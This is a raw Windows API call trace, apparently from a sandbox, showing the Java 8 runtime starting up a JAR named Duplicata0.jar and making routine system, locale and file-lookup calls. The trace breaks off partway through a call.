returned 0x6d60fed0 [0015.484] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x4bf470 | out: lpBuffer="C:\\Users\\DSSDPM~1\\AppData\\Local\\Temp\\") returned 0x25 [0015.485] _wgetenv (_VarName="JAVA2D_FONTPATH") returned 0x0 [0015.485] GetVersionExA (in: lpVersionInformation=0x4bf3d4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x4bf508, dwMinorVersion=0x4bf508, dwBuildNumber=0x6d59210d, dwPlatformId=0x13e1a1f0, szCSDVersion="") | out: lpVersionInformation=0x4bf3d4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0015.485] GetNativeSystemInfo (in: lpSystemInfo=0x4bf39c | out: lpSystemInfo=0x4bf39c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0015.485] strlen (_Str="\\kernel32.dll") returned 0xd [0015.485] GetSystemDirectoryW (in: lpBuffer=0x4bf470, uSize=0xf6 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0015.485] wcsncat (in: _Dest=0x4bf470, _Source="\\kernel32.dll", _Count=0xf1 | out: _Dest="C:\\Windows\\system32\\kernel32.dll") returned="C:\\Windows\\system32\\kernel32.dll" [0015.485] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\kernel32.dll", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x73c [0015.490] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\kernel32.dll", dwHandle=0x0, dwLen=0x73c, lpData=0xb2a7a0 | out: lpData=0xb2a7a0) returned 1 [0015.490] VerQueryValueW (in: pBlock=0xb2a7a0, lpSubBlock="\\", lplpBuffer=0x4bf3c4, puLen=0x4bf3cc | out: lplpBuffer=0x4bf3c4*=0xb2a7c8, puLen=0x4bf3cc) returned 1 [0015.490] sprintf (in: _Dest=0x4bf67c, _Format="%d.%d" | out: _Dest="6.1") returned 3 [0015.490] GetSystemInfo (in: lpSystemInfo=0x4bf350 | out: lpSystemInfo=0x4bf350*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0015.490] IsProcessorFeaturePresent (ProcessorFeature=0x3) returned 1 [0015.490] _wgetenv (_VarName="USERNAME") returned="DSsDPMx042" [0015.490] wcslen (_String="DSsDPMx042") returned 0xa [0015.490] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759e0000 [0016.997] GetProcAddress (hModule=0x759e0000, lpProcName="SHGetKnownFolderPath") returned 0x75a94ca0 [0016.997] SHGetKnownFolderPath (in: rfid=0x6e1053ac, param_2=0x4000, hToken=0x0, ppszPath=0x6e10cf70 | out: ppszPath=0x6e10cf70*="C:\\Users\\DSsDPMx042") returned 0x0 [0017.415] GetUserDefaultLCID () returned 0x409 [0017.415] GetSystemDefaultLCID () returned 0x409 [0017.415] GetUserDefaultUILanguage () returned 0x409 [0017.415] GetLocaleInfoA (in: Locale=0x409, LCType=0x5c, lpLCData=0x4bf31c, cchData=86 | out: lpLCData="en-US") returned 6 [0017.416] strlen (_Str="U") returned 0x1 [0017.416] GetLocaleInfoA (in: Locale=0x409, LCType=0x5a, lpLCData=0xac7830, cchData=9 | out: lpLCData="US") returned 3 [0017.416] GetLocaleInfoA (in: Locale=0x409, LCType=0x59, lpLCData=0xac7848, cchData=9 | out: lpLCData="en") returned 3 [0017.416] strcmp (_Str1="en", _Str2="nb") returned -1 [0017.416] strcmp (_Str1="en", _Str2="nn") returned -1 [0017.416] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xac787a, cchData=14 | out: lpLCData="1252") returned 5 [0017.416] atoi (_Str="1252") returned 1252 [0017.417] strcmp (_Str1="Cp1252", _Str2="MS950") returned -1 [0017.417] strcmp (_Str1="Cp1252", _Str2="GBK") returned -1 [0017.417] GetLocaleInfoA (in: Locale=0x409, LCType=0x5c, lpLCData=0x4bf30c, cchData=86 | out: lpLCData="en-US") returned 6 [0017.417] strlen (_Str="U") returned 0x1 [0017.417] GetLocaleInfoA (in: Locale=0x409, LCType=0x5a, lpLCData=0xac78a8, cchData=9 | out: lpLCData="US") returned 3 [0017.417] GetLocaleInfoA (in: Locale=0x409, LCType=0x59, lpLCData=0xac78c0, cchData=9 | out: lpLCData="en") returned 3 [0017.417] strcmp (_Str1="en", _Str2="nb") returned -1 [0017.417] strcmp (_Str1="en", _Str2="nn") returned -1 [0017.417] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xac78f2, cchData=14 | out: lpLCData="1252") returned 5 [0017.417] atoi (_Str="1252") returned 1252 [0017.417] strcmp (_Str1="Cp1252", _Str2="MS950") returned -1 [0017.417] strcmp (_Str1="Cp1252", _Str2="GBK") returned -1 [0017.417] GetLocaleInfoA (in: Locale=0x409, LCType=0x5c, lpLCData=0x4bf2fc, cchData=86 | out: lpLCData="en-US") returned 6 [0017.417] strlen (_Str="U") returned 0x1 [0017.417] GetLocaleInfoA (in: Locale=0x409, LCType=0x5a, lpLCData=0xac7920, cchData=9 | out: lpLCData="US") returned 3 [0017.417] GetLocaleInfoA (in: Locale=0x409, LCType=0x59, lpLCData=0xac7938, cchData=9 | out: lpLCData="en") returned 3 [0017.417] strcmp (_Str1="en", _Str2="nb") returned -1 [0017.417] strcmp (_Str1="en", _Str2="nn") returned -1 [0017.417] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xac796a, cchData=14 | out: lpLCData="1252") returned 5 [0017.417] atoi (_Str="1252") returned 1252 [0017.418] strcmp (_Str1="Cp1252", _Str2="MS950") returned -1 [0017.418] strcmp (_Str1="Cp1252", _Str2="GBK") returned -1 [0017.418] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xac7982, cchData=14 | out: lpLCData="1252") returned 5 [0017.418] atoi (_Str="1252") returned 1252 [0017.418] strcmp (_Str1="Cp1252", _Str2="MS950") returned -1 [0017.418] strcmp (_Str1="Cp1252", _Str2="GBK") returned -1 [0017.418] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0017.418] GetFileType (hFile=0x7) returned 0x2 [0017.418] GetConsoleCP () returned 0x1b5 [0017.419] sprintf (in: _Dest=0xac7998, _Format="cp%d" | out: _Dest="cp437") returned 5 [0017.419] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0017.419] GetFileType (hFile=0xb) returned 0x2 [0017.419] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4bf470 | out: lpBuffer="C:\\Users\\DSsDPMx042\\Desktop") returned 0x1b [0017.427] wcslen (_String="C:\\Users\\DSSDPM~1\\AppData\\Local\\Temp\\") returned 0x25 [0017.427] wcslen (_String="DSsDPMx042") returned 0xa [0017.428] wcslen (_String="C:\\Users\\DSsDPMx042") returned 0x13 [0017.428] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop") returned 0x1b [0017.429] GetModuleHandleA (lpModuleName="jvm") returned 0x6d510000 [0017.429] GetModuleFileNameA (in: hModule=0x6d510000, lpFilename=0xb2be00, nSize=0x104 | out: lpFilename="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\client\\jvm.dll") returned 0x34 [0017.429] strlen (_Str="kernel") returned 0x6 [0017.429] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\client") returned 0x2c [0017.429] strcmp (_Str1="kernel", _Str2="client") returned 1 [0017.430] strcmp (_Str1="Cp1252", _Str2="8859_1") returned 1 [0017.430] strcmp (_Str1="Cp1252", _Str2="ISO8859-1") returned -1 [0017.430] strcmp (_Str1="Cp1252", _Str2="ISO8859_1") returned -1 [0017.430] strcmp (_Str1="Cp1252", _Str2="ISO646-US") returned -1 [0017.430] strcmp (_Str1="Cp1252", _Str2="Cp1252") returned 0 [0017.430] strlen (_Str="user.language") returned 0xd [0017.430] strlen (_Str="user.script") returned 0xb [0017.431] strlen (_Str="user.country") returned 0xc [0017.431] strlen (_Str="user.variant") returned 0xc [0017.431] strlen (_Str="file.encoding") returned 0xd [0017.431] strlen (_Str="java.vm.specification.name") returned 0x1a [0017.431] strlen (_Str="Java Virtual Machine Specification") returned 0x22 [0017.431] strlen (_Str="java.vm.version") returned 0xf [0017.432] strlen (_Str="25.92-b14") returned 0x9 [0017.432] strlen (_Str="java.vm.name") returned 0xc [0017.432] strlen (_Str="Java HotSpot(TM) Client VM") returned 0x1a [0017.432] strlen (_Str="java.vm.info") returned 0xc [0017.432] strlen (_Str="mixed mode, sharing") returned 0x13 [0017.432] strlen (_Str="java.ext.dirs") returned 0xd [0017.432] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext;C:\\Windows\\Sun\\Java\\lib\\ext") returned 0x45 [0017.432] strlen (_Str="java.endorsed.dirs") returned 0x12 [0017.432] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\endorsed") returned 0x2e [0017.432] strlen (_Str="sun.boot.library.path") returned 0x15 [0017.432] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_92\\bin") returned 0x25 [0017.433] strlen (_Str="java.library.path") returned 0x11 [0017.433] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_92\\bin;C:\\Windows\\Sun\\Java\\bin;C:\\Windows\\system32;C:\\Windows;C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;.") returned 0xe6 [0017.433] strlen (_Str="java.home") returned 0x9 [0017.433] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0017.433] strlen (_Str="java.class.path") returned 0xf [0017.433] strlen (_Str="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.433] strlen (_Str="sun.boot.class.path") returned 0x13 [0017.433] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar;C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar;C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar;C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar;C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar;C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar;C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar;C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned 0x17d [0017.433] strlen (_Str="java.vm.specification.vendor") returned 0x1c [0017.433] strlen (_Str="Oracle Corporation") returned 0x12 [0017.434] strlen (_Str="java.vm.specification.version") returned 0x1d [0017.434] strlen (_Str="1.8") returned 0x3 [0017.434] strlen (_Str="java.vm.vendor") returned 0xe [0017.434] strlen (_Str="Oracle Corporation") returned 0x12 [0017.434] strlen (_Str="sun.java.command") returned 0x10 [0017.434] strlen (_Str="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0017.434] strlen (_Str="sun.java.launcher") returned 0x11 [0017.435] strlen (_Str="SUN_STANDARD") returned 0xc [0017.435] strlen (_Str="sun.nio.MaxDirectMemorySize") returned 0x1b [0017.435] strlen (_Str="-1") returned 0x2 [0017.435] strlen (_Str="sun.management.compiler") returned 0x17 [0017.435] strlen (_Str="HotSpot Client Compiler") returned 0x17 [0017.435] strlen (_Str="sun.cds.enableSharedLookupCache") returned 0x1f [0017.435] strlen (_Str="false") returned 0x5 [0017.435] strlen (_Str="sun.locale.formatasdefault") returned 0x1a [0017.435] strlen (_Str="user.language") returned 0xd [0017.436] strlen (_Str="user.language.display") returned 0x15 [0017.436] strcmp (_Str1="en", _Str2="en") returned 0 [0017.436] strlen (_Str="user.language.format") returned 0x14 [0017.436] strcmp (_Str1="en", _Str2="en") returned 0 [0017.436] strlen (_Str="user.script") returned 0xb [0017.437] strlen (_Str="user.script.display") returned 0x13 [0017.437] strcmp (_Str1="", _Str2="") returned 0 [0017.437] strlen (_Str="user.script.format") returned 0x12 [0017.437] strcmp (_Str1="", _Str2="") returned 0 [0017.437] strlen (_Str="user.country") returned 0xc [0017.437] strlen (_Str="user.country.display") returned 0x14 [0017.438] strcmp (_Str1="US", _Str2="US") returned 0 [0017.438] strlen (_Str="user.country.format") returned 0x13 [0017.438] strcmp (_Str1="US", _Str2="US") returned 0 [0017.438] strlen (_Str="user.variant") returned 0xc [0017.438] strlen (_Str="user.variant.display") returned 0x14 [0017.438] strcmp (_Str1="", _Str2="") returned 0 [0017.438] strlen (_Str="user.variant.format") returned 0x13 [0017.439] strcmp (_Str1="", _Str2="") returned 0 [0017.439] strlen (_Str="file.encoding") returned 0xd [0017.452] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0017.452] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0017.452] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0017.522] strlen (_Str="sun/nio/cs/IBM437") returned 0x11 [0017.522] strlen (_Str="sun/nio/cs/IBM437.class") returned 0x17 [0017.522] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x338d18d, lpNewFilePointer=0x0, dwMoveMethod=0x4beea0 | out: lpNewFilePointer=0x0) returned 1 [0017.522] ReadFile (in: hFile=0xd4, lpBuffer=0xaca980, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bee70, lpOverlapped=0x0 | out: lpBuffer=0xaca980*, lpNumberOfBytesRead=0x4bee70*=0xa0, lpOverlapped=0x0) returned 1 [0017.522] strlen (_Str="sun/nio/cs/IBM437.class") returned 0x17 [0017.522] strcpy (in: _Dest=0x4befa4, _Source="sun/nio/cs/IBM437.class" | out: _Dest="sun/nio/cs/IBM437.class") returned="sun/nio/cs/IBM437.class" [0017.522] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25b3d4e, lpNewFilePointer=0x0, dwMoveMethod=0x4beaa4 | out: lpNewFilePointer=0x0) returned 1 [0017.522] ReadFile (in: hFile=0xd4, lpBuffer=0x4beadc, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bea74, lpOverlapped=0x0 | out: lpBuffer=0x4beadc*, lpNumberOfBytesRead=0x4bea74*=0x1e, lpOverlapped=0x0) returned 1 [0017.524] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25b3d83, lpNewFilePointer=0x0, dwMoveMethod=0x4beae0 | out: lpNewFilePointer=0x0) returned 1 [0017.524] ReadFile (in: hFile=0xd4, lpBuffer=0xaaf7f0, nNumberOfBytesToRead=0x687, lpNumberOfBytesRead=0x4beab0, lpOverlapped=0x0 | out: lpBuffer=0xaaf7f0*, lpNumberOfBytesRead=0x4beab0*=0x687, lpOverlapped=0x0) returned 1 [0017.561] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x7594cc56, phModule=0x4befd0 | out: phModule=0x4befd0*=0x75900000) returned 1 [0017.561] GetProcAddress (hModule=0x75900000, lpProcName="GetFinalPathNameByHandleW") returned 0x75934e2a [0017.569] strlen (_Str="") returned 0x0 [0017.569] strlen (_Str=".dll") returned 0x4 [0017.571] strlen (_Str="") returned 0x0 [0017.571] strlen (_Str=".dll") returned 0x4 [0017.571] GetModuleHandleA (lpModuleName=0x0) returned 0xda0000 [0017.571] strlen (_Str="zip.dll") returned 0x7 [0017.571] strcpy (in: _Dest=0xaa8760, _Source="zip.dll" | out: _Dest="zip.dll") returned="zip.dll" [0017.571] strlen (_Str="zip.dll") returned 0x7 [0017.571] strlen (_Str="zip") returned 0x3 [0017.571] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0017.571] strncpy (in: _Dest=0xac8c00, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoad") returned="_JNI_OnLoad" [0017.572] strcat (in: _Dest=0xac8c00, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0017.572] strcat (in: _Dest=0xac8c00, _Source="zip" | out: _Dest="_JNI_OnLoad_zip") returned="_JNI_OnLoad_zip" [0017.572] strcat (in: _Dest=0xac8c00, _Source="@8" | out: _Dest="_JNI_OnLoad_zip@8") returned="_JNI_OnLoad_zip@8" [0017.572] strlen (_Str="zip") returned 0x3 [0017.572] strlen (_Str="JNI_OnLoad") returned 0xa [0017.572] strcpy (in: _Dest=0xb2aa78, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0017.572] strcat (in: _Dest=0xb2aa78, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0017.572] strcat (in: _Dest=0xb2aa78, _Source="zip" | out: _Dest="JNI_OnLoad_zip") returned="JNI_OnLoad_zip" [0017.575] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll") returned 0x2d [0017.575] wcscpy (in: _Dest=0xb2eeb8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll") returned="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll" [0017.575] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll", nBufferLength=0x9, lpBuffer=0x4bf1e0, lpFilePart=0x4bf1dc | out: lpBuffer="", lpFilePart=0x4bf1dc) returned 0x2e [0017.575] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll", fInfoLevelId=0x0, lpFileInformation=0x4bf1d0 | out: lpFileInformation=0x4bf1d0) returned 1 [0017.576] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll") returned 0x2d [0017.576] _wgetcwd () returned 0xb2ad70 [0017.576] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop") returned 0x1b [0017.577] _wfullpath (in: _Buffer=0xb2eeb8, _Path="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll") returned="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll" [0017.577] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll") returned 0x2d [0017.577] wcsncmp (_String1="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0017.577] wcslen (_String="C:\\Program Files") returned 0x10 [0017.577] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x4beb90 | out: lpFindFileData=0x4beb90) returned 0x24ee80 [0017.577] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.577] wcslen (_String="Program Files") returned 0xd [0017.577] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0017.577] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x4beb90 | out: lpFindFileData=0x4beb90) returned 0x24ee80 [0017.577] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.577] wcslen (_String="Java") returned 0x4 [0017.577] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0017.578] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", lpFindFileData=0x4beb90 | out: lpFindFileData=0x4beb90) returned 0x24ee80 [0017.578] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.578] wcslen (_String="jre1.8.0_92") returned 0xb [0017.578] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin") returned 0x25 [0017.578] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin", lpFindFileData=0x4beb90 | out: lpFindFileData=0x4beb90) returned 0x24ee80 [0017.578] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.578] wcslen (_String="bin") returned 0x3 [0017.578] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll") returned 0x2d [0017.578] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll", lpFindFileData=0x4beb90 | out: lpFindFileData=0x4beb90) returned 0x24ee80 [0017.578] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.578] wcslen (_String="zip.dll") returned 0x7 [0017.578] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll") returned 0x2d [0017.580] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll") returned 0x2d [0017.580] wcscpy (in: _Dest=0xac9e38, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll") returned="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll" [0017.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll", nBufferLength=0x9, lpBuffer=0x4bf5c0, lpFilePart=0x4bf5bc | out: lpBuffer="", lpFilePart=0x4bf5bc) returned 0x2e [0017.580] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll", fInfoLevelId=0x0, lpFileInformation=0x4bf5b0 | out: lpFileInformation=0x4bf5b0) returned 1 [0017.580] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll") returned 0x2d [0017.580] wcscpy (in: _Dest=0xac9e38, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll") returned="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll" [0017.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll", nBufferLength=0x9, lpBuffer=0x4bf5c0, lpFilePart=0x4bf5bc | out: lpBuffer="", lpFilePart=0x4bf5bc) returned 0x2e [0017.580] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\zip.dll", fInfoLevelId=0x0, lpFileInformation=0x4bf5b0 | out: lpFileInformation=0x4bf5b0) returned 1 [0017.582] GetModuleHandleA (lpModuleName=0x0) returned 0xda0000 [0017.582] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0017.582] strcpy (in: _Dest=0xb2aa78, _Source="_JNI_OnLoad@8" | out: _Dest="_JNI_OnLoad@8") returned="_JNI_OnLoad@8" [0017.582] strlen (_Str="JNI_OnLoad") returned 0xa [0017.583] strcpy (in: _Dest=0xb2aa78, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0017.601] SetErrorMode (uMode=0x0) returned 0x0 [0017.601] SetErrorMode (uMode=0x1) returned 0x0 [0017.619] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\meta-index") returned 0x34 [0017.619] wcscpy (in: _Dest=0xb2af78, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\meta-index" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\meta-index") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\meta-index" [0017.619] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\meta-index", nBufferLength=0x9, lpBuffer=0x4bed90, lpFilePart=0x4bed8c | out: lpBuffer="", lpFilePart=0x4bed8c) returned 0x35 [0017.619] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\meta-index", fInfoLevelId=0x0, lpFileInformation=0x4bed80 | out: lpFileInformation=0x4bed80) returned 1 [0017.626] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\meta-index") returned 0x34 [0017.626] wcscpy (in: _Dest=0xb2af78, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\meta-index" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\meta-index") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\meta-index" [0017.626] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_92\\lib\\ext\\meta-index"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0017.629] strlen (_Str="sun/nio/cs/MS1252") returned 0x11 [0017.634] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.635] _wfullpath (in: _Buffer=0xb2ffb0, _Path="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext" [0017.635] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.635] wcsncmp (_String1="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0017.635] wcslen (_String="C:\\Program Files") returned 0x10 [0017.635] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x4be2c0 | out: lpFindFileData=0x4be2c0) returned 0x24ee80 [0017.635] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.635] wcslen (_String="Program Files") returned 0xd [0017.635] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0017.635] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x4be2c0 | out: lpFindFileData=0x4be2c0) returned 0x24ee80 [0017.635] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.635] wcslen (_String="Java") returned 0x4 [0017.635] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0017.635] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", lpFindFileData=0x4be2c0 | out: lpFindFileData=0x4be2c0) returned 0x24ee80 [0017.636] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.636] wcslen (_String="jre1.8.0_92") returned 0xb [0017.636] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0017.636] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib", lpFindFileData=0x4be2c0 | out: lpFindFileData=0x4be2c0) returned 0x24ee80 [0017.636] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.636] wcslen (_String="lib") returned 0x3 [0017.636] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.636] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext", lpFindFileData=0x4be2c0 | out: lpFindFileData=0x4be2c0) returned 0x24ee80 [0017.637] FindClose (in: hFindFile=0x24ee80 | out: hFindFile=0x24ee80) returned 1 [0017.637] wcslen (_String="ext") returned 0x3 [0017.637] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.637] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.637] wcscpy (in: _Dest=0xb2fb68, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext" [0017.637] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext", nBufferLength=0x9, lpBuffer=0x4becf0, lpFilePart=0x4becec | out: lpBuffer="", lpFilePart=0x4becec) returned 0x2a [0017.637] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext", fInfoLevelId=0x0, lpFileInformation=0x4bece0 | out: lpFileInformation=0x4bece0) returned 1 [0017.638] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned 0x29 [0017.638] wcscpy (in: _Dest=0xb2fb68, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext" [0017.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext", nBufferLength=0x9, lpBuffer=0x4becf0, lpFilePart=0x4becec | out: lpBuffer="", lpFilePart=0x4becec) returned 0x2a [0017.638] GetFileAttributesExW (in: lpFileName="C:\\Program 